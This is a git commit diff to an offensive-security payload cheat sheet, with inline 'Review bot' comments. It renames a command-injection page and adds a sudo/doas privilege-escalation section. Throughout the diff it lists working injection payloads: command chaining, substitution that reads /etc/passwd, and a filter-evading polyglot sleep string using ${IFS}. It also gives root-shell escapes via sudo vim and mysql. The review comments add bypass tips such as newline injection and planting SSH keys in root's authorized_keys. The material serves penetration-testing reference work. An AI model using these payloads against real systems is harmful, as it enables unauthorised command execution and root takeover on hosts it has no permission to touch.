Command injection renamed + sudo/doas privesc

This commit is contained in:
Swissky 2019-01-22 21:45:41 +01:00
parent 4db45a263a
commit e07a654080
4 changed files with 42 additions and 7 deletions

View File

@ -1,11 +1,11 @@
# Remote Commands Execution # Command Injection
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
Remote Commands execution is a security vulnerability that allows an attacker to execute commands from a remote server.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Exploits ## Exploits
Normal Commands execution, execute the command and voila :p Normal command, execute the command and voila :p
```powershell ```powershell
cat /etc/passwd cat /etc/passwd
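Review bot: the fence around `cat /etc/passwd` is still tagged `powershell` even though the two later hunks in this file switch their fences to `bash`; change this one as well so the file is consistent, since the example is a Unix shell command. The new definition is also slightly off: the injected commands are not executed "inside a vulnerable application" but by the operating system of the host that runs it, through the shell the application invokes, which is exactly what separates command injection from code injection; suggest "allows an attacker to execute arbitrary operating-system commands on the server that runs the vulnerable application". The relocation note is useful; "Reverse shell commands have been relocated to a single file" reads better than "Reverse Shell Command are relocated".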
@ -17,7 +17,7 @@ sys:x:3:3:sys:/dev:/bin/sh
Commands execution by chaining commands Commands execution by chaining commands
```powershell ```bash
original_cmd_by_server; ls original_cmd_by_server; ls
original_cmd_by_server && ls original_cmd_by_server && ls
original_cmd_by_server | ls original_cmd_by_server | ls
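Review bot: the chaining list (`;`, `&&`, `|`, `||`) omits two separators that matter when `;` is filtered: `&`, which backgrounds the original command and runs `ls` regardless of its result, and the newline (`%0a` when the payload travels in a URL or form field). Suggest adding `original_cmd_by_server & ls` with a note on `%0a`. The `|` case also deserves a one-line comment like the one the `||` line has: `ls` still runs, but the original command's output is consumed as its stdin and never reaches the response, so this variant is the wrong choice when the goal is to keep the original output visible.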
@ -26,7 +26,7 @@ original_cmd_by_server || ls Only if the first cmd fail
Commands execution inside a command Commands execution inside a command
```powershell ```bash
original_cmd_by_server `cat /etc/passwd` original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd) original_cmd_by_server $(cat /etc/passwd)
``` ```
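Review bot: the `bash` fence is the right fix, but the two lines need a sentence on what they actually do: both the backtick and `$(...)` forms run `cat /etc/passwd` first and splice its output into the argument list of `original_cmd_by_server`, so the file contents only come back if that command echoes its arguments or reports them in an error; when it does not, a time-based variant such as `$(sleep 5)` still confirms that substitution happened. Worth stating too that both forms only expand when the application hands the string to a shell (`system()`, `sh -c`, backticks in the server-side language); an `exec`-style call that passes a separate argument array never interprets them.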
@ -167,6 +167,17 @@ Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca - dnsbin.zhack.ca
- pingb.in - pingb.in
## Polyglot command injection
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
```
## References ## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
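Review bot: the new Polyglot section drops the payload without saying why it works, and the `e.g:` line is prose inside a `bash` fence. Suggest a short paragraph above the block: the three `;sleep${IFS}9;#` segments are separated by `'` and `"` so that exactly one of them executes whether the injection point is unquoted, inside single quotes or inside double quotes (the three `echo` lines demonstrate each case); `${IFS}` stands in for the space, because field splitting of the unquoted expansion turns `sleep${IFS}9` into `sleep 9` and so survives space filtering; and `#` comments out the remainder of the line so the closing quote the application appends cannot break the syntax. Also state that `1` is a placeholder for the legitimate value and that 9 seconds is the delay to tune for detection, and either move `e.g:` out of the fence or make it a `#` comment so the block can be pasted as-is.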

View File

@ -132,8 +132,31 @@ Edit capabilites
setcap cap_net_raw+p /bin/ping # add setcap cap_net_raw+p /bin/ping # add
``` ```
## SUDO
## GTFOBins Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
```bash
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
```
In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
```bash
sudo vim -c '!sh'
sudo -u root vim -c '!sh'
```
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
```bash
permit nopass demo as root cmd vim
```
### GTFOBins
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
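Review bot: "adding an ssh key into the root directory" is imprecise enough to mislead: the key belongs in root's home, `/root/.ssh/authorized_keys`, not in `/`; suggest "by writing a public key to `/root/.ssh/authorized_keys` with `sudo vim`". The `doas` paragraph shows the `permit nopass demo as root cmd vim` rule but not the matching invocation; add `doas vim -c '!sh'` after the config block so both tools are presented the same way. `sudo -u root vim -c '!sh'` duplicates the line above it, since root is the default target user; keep it only if the text explains that `-u` is what to reach for when the rule grants a different account, e.g. `(www-data) NOPASSWD: ...`. Demoting `## GTFOBins` to `### GTFOBins` files it under SUDO, while the heading's own sentence says the list covers binaries that "bypass local security restrictions" in general, which includes the SUID and capabilities material this file also carries; keep it at `##`. Minor grammar: "another user's privileges", and split "it is now trivial to get a shell ..." into its own sentence.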
@ -143,6 +166,7 @@ The project collects legitimate functions of Unix binaries that can be abused to
> sudo mysql -e '\! /bin/sh' > sudo mysql -e '\! /bin/sh'
> strace -o /dev/null /bin/sh > strace -o /dev/null /bin/sh
## Groups ## Groups
### Docker ### Docker
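Review bot: the context line `strace -o /dev/null /bin/sh` has no `sudo` prefix, unlike `sudo mysql -e '\! /bin/sh'` directly above it; run as an ordinary user it only spawns the caller's own shell with no privilege change, so in this sudo list it should read `sudo strace -o /dev/null /bin/sh`, which is the form GTFOBins gives for the sudo case. The hunk header reports one added line but none is visible in the rendered hunk, so nothing further to review here.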